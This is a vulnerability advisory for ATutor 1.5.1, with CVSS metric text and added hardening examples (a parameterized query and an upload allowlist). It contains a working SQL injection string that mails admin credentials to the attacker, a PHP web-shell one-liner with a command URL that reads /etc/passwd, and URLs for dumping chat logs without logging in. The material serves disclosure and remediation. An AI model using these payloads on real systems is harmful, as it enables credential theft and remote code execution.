The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity (AC): Low
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required (PR): High
The attacker requires privileges that provide significant (e.g., administrative) control over the vulnerable system allowing full access to the vulnerable system’s settings and files.
Scope (S)
An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality (C): High
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity (I): High
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability (A): High
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
ATUTOR 1.5.1 (possibly prior versions)
SQL INJECTION / ADMIN & USERS CREDENTIALS DISCLOSURE / INFORMATION DISCLOSURE /
USER IMPERSONATION / REMOTE CODE EXECUTION
software:
site: http://www.atutor.ca/
description: "ATutor is an Open Source Web-based Learning Content Management System (LCMS) designed with
accessibility and adaptability in mind. Administrators can install or update ATutor in minutes, and
develop custom templates to give ATutor a new look. Educators can quickly assemble, package, and redistribute
Web-based instructional content, easily retrieve and import prepackaged content, and conduct their courses online.
Students learn in an adaptive learning environment."
a) if magic_quotes_gpc is off in php.ini -> SQL INJECTION
without having a user account, you can use the password reminder to send yourself the admin
login & password, no need for exploit code:
go to http://[target]/[path]/password_reminder.php
and in the email field type:
' UNION SELECT login, password, 'your_email (at) domain (dot) com [email concealed]' FROM AT_admins /*
look at the vulnerable code in password_reminder.php:
...
// $_POST['form_email'] is interpolated straight into the query string
$sql = "SELECT login, password, email FROM ".TABLE_PREFIX."members WHERE email='$_POST[form_email]'";
$result = mysql_query($sql, $db);
if ($row = mysql_fetch_assoc($result)) {
    $r_login  = $row['login'];
    $r_passwd = $row['password'];
    $r_email  = $row['email'];
    $tmp_message  = _AT(array('password_request2', $_base_href))."\n\n";
    $tmp_message .= _AT('web_site').' : '.$_base_href."\n";
    $tmp_message .= _AT('login_name').' : '.$r_login."\n";
    $tmp_message .= _AT('password').' : '.$r_passwd."\n";
    require(AT_INCLUDE_PATH . 'classes/phpmailer/atutormailer.class.php');
    $mail = new ATutorMailer;
    $mail->From = EMAIL;
    // the address comes from the same (attacker-controlled) result row
    $mail->AddAddress($r_email);
    $mail->Subject = SITE_NAME . ': ' . _AT('password_reminder');
    $mail->Body = $tmp_message;
    if (!$mail->Send()) {
        //echo 'There was an error sending the message';
        $msg->printErrors('SENDING_ERROR');
        exit;
    }
    $msg->addFeedback('PASSWORD_SUCCESS');
...
$_POST[form_email] is not filtered in any way, as you can see, so the query becomes:
SELECT login, password, email FROM AT_members WHERE email='' UNION SELECT login, password, 'your_email (at) domain (dot) com [email concealed]' FROM AT_admins /*'
/* are the MySQL comment chars, so the trailing quote is commented out and this is a valid query
$r_login and $r_passwd are the admin user & password, but $r_email is yours! ;)
also, you can get the password of any user by typing:
' UNION SELECT login, password, 'your_email (at) domain (dot) com [email concealed]' FROM AT_members where login='user_whom_you_want_the_password' /*
if you want to see whether your course server is vulnerable, just type ' in the email field; you will get an error like this:
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in
[pathto]/password_reminder.php on line 27
if not, you will see a message like this:
The following errors occurred:
* No account found with that email address.
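For comparison, here is the same lookup with the e-mail value bound as a query parameter instead of being pasted into the SQL text. This is an added example, not ATutor's code; it runs against a constructed in-memory SQLite table that stands in for AT_members, and assumes only the TABLE_PREFIX constant shown in the advisory.

```php
<?php
// Added example (not ATutor's code): password_reminder.php lookup with a bound
// parameter, demonstrated on a constructed SQLite fixture instead of MySQL.
if (!defined('TABLE_PREFIX')) {
    define('TABLE_PREFIX', 'AT_'); // same prefix as AT_members / AT_admins above
}

function find_member_by_email(PDO $db, string $email): ?array
{
    // The table name is a trusted constant; the user-supplied address is bound,
    // so quotes, UNION and /* inside it are compared as literal text and never
    // change the shape of the statement. (Format validation of the address is
    // a separate, additional layer and is not what stops the injection.)
    // Only login and email are selected: a reminder never needs the password column.
    $stmt = $db->prepare('SELECT login, email FROM ' . TABLE_PREFIX . 'members WHERE email = ?');
    $stmt->execute([$email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed fixture with the two tables the advisory talks about.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE ' . TABLE_PREFIX . 'members (login TEXT, password TEXT, email TEXT)');
$db->exec('CREATE TABLE ' . TABLE_PREFIX . 'admins (login TEXT, password TEXT)');
$db->exec("INSERT INTO AT_members VALUES ('alice', 'hash1', 'alice@example.com')");
$db->exec("INSERT INTO AT_admins VALUES ('root', 'adminhash')");

// A legitimate address finds its own row.
var_dump(find_member_by_email($db, 'alice@example.com'));

// The advisory's payload is now just a long string that matches no e-mail
// address, so no row (and no admin credential) comes back.
$payload = "' UNION SELECT login, password, 'someone@example.com' FROM AT_admins /*";
var_dump(find_member_by_email($db, $payload));
```

The same change applies to every other place where `$_POST` or `$_GET` values are concatenated into a query; relying on magic_quotes_gpc is not a substitute, since the advisory's first precondition is exactly that it may be off.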
b) once you have the stolen admin or educator account (yes, an educator can upload executable files :) )
you can execute arbitrary commands on the target system by uploading an .inc file (this extension is not checked)
with PHP code inside, example:
<?php error_reporting(0); system($HTTP_GET_VARS[cmd]); ?>
then you can launch commands, example:
http://[target]/[path]/atutor/content/2/cmd.inc?cmd=cat%20/etc/passwd
(usually the upload dir is 'content' if the admin did not change it, and the subdir is numbered by the order of
user registration, so you can quickly bruteforce the url manually)
look at the list of illegal extensions in config.inc.php:
...
/* Illegal file types, by extension. Include any extensions */
/* you do not want to allow for uploading. (Just the extension */
/* without the leading dot.) */
$IllegalExtentions = array('exe','asp','php','php3','bat','cgi','pl','com','vbs','reg','pcd',
                           'pif','scr','bas','inf','vb','vbe','wsc','wsf','wsh');
...
but where are .inc, .php4, .phtml, .html, .pwml and so on if you do not add them yourself?
it would be better to define which kinds of files you CAN upload (an allowlist) instead...
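To show the difference the advisory is pointing at, the following added example (not ATutor's code) runs the $IllegalExtentions blacklist from config.inc.php and an allowlist check side by side over constructed filenames. The allowed list and the filenames are assumptions chosen for the demonstration.

```php
<?php
// Added example (not ATutor's code): blacklist from config.inc.php vs. an allowlist.
$IllegalExtentions = array('exe','asp','php','php3','bat','cgi','pl','com','vbs','reg','pcd',
                           'pif','scr','bas','inf','vb','vbe','wsc','wsf','wsh');

// Original approach: reject only the extensions someone remembered to list.
function blacklist_allows(string $name, array $illegal): bool
{
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return !in_array($ext, $illegal, true);
}

// Hardened approach (assumed list): accept only the content types a course needs,
// compare case-insensitively, and judge every dot-separated suffix so that a
// name like "shell.php.jpg" is refused because of its inner ".php".
$ALLOWED = array('txt', 'pdf', 'jpg', 'jpeg', 'png', 'gif', 'zip');

function allowlist_allows(string $name, array $allowed): bool
{
    $parts = explode('.', strtolower(basename($name)));
    if (count($parts) < 2 || $parts[0] === '') {   // no extension at all, or a dotfile
        return false;
    }
    foreach (array_slice($parts, 1) as $ext) {
        if (!in_array($ext, $allowed, true)) {
            return false;
        }
    }
    return true;
}

// Constructed sample uploads. The first three pass the blacklist (inc, phtml
// and INC are not on it); the allowlist refuses all of them plus the double
// extension, and accepts only the PDF.
foreach (array('cmd.inc', 'page.phtml', 'CMD.INC', 'shell.php.jpg', 'lesson.pdf') as $f) {
    printf("%-14s blacklist:%-5s allowlist:%s\n", $f,
        blacklist_allows($f, $IllegalExtentions) ? 'allow' : 'deny',
        allowlist_allows($f, $ALLOWED) ? 'allow' : 'deny');
}
```

Checking every suffix means a name such as "lesson.v2.pdf" is also refused; that is the intended trade-off, since the web server decides which suffix to execute. Independently of the filename check, the upload directory should be served with script execution disabled so that a file that does get through is returned as data rather than run.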
c) without having an account, a user can read chat conversations without being logged in, by making GET requests for the
chat temporary files:
example:
http://[target]/[path]/atutor/content/chat/2/msgs/1.message
http://[target]/[path]/atutor/content/chat/2/msgs/2.message
http://[target]/[path]/atutor/content/chat/2/msgs/3.message
cycling through these GET requests a user can dump the whole chat archive
rgod
site: http://rgod.altervista.org
mail: retrogod [at] aliceposta.it
original advisory: http://rgod.altervista.org/atutor151.html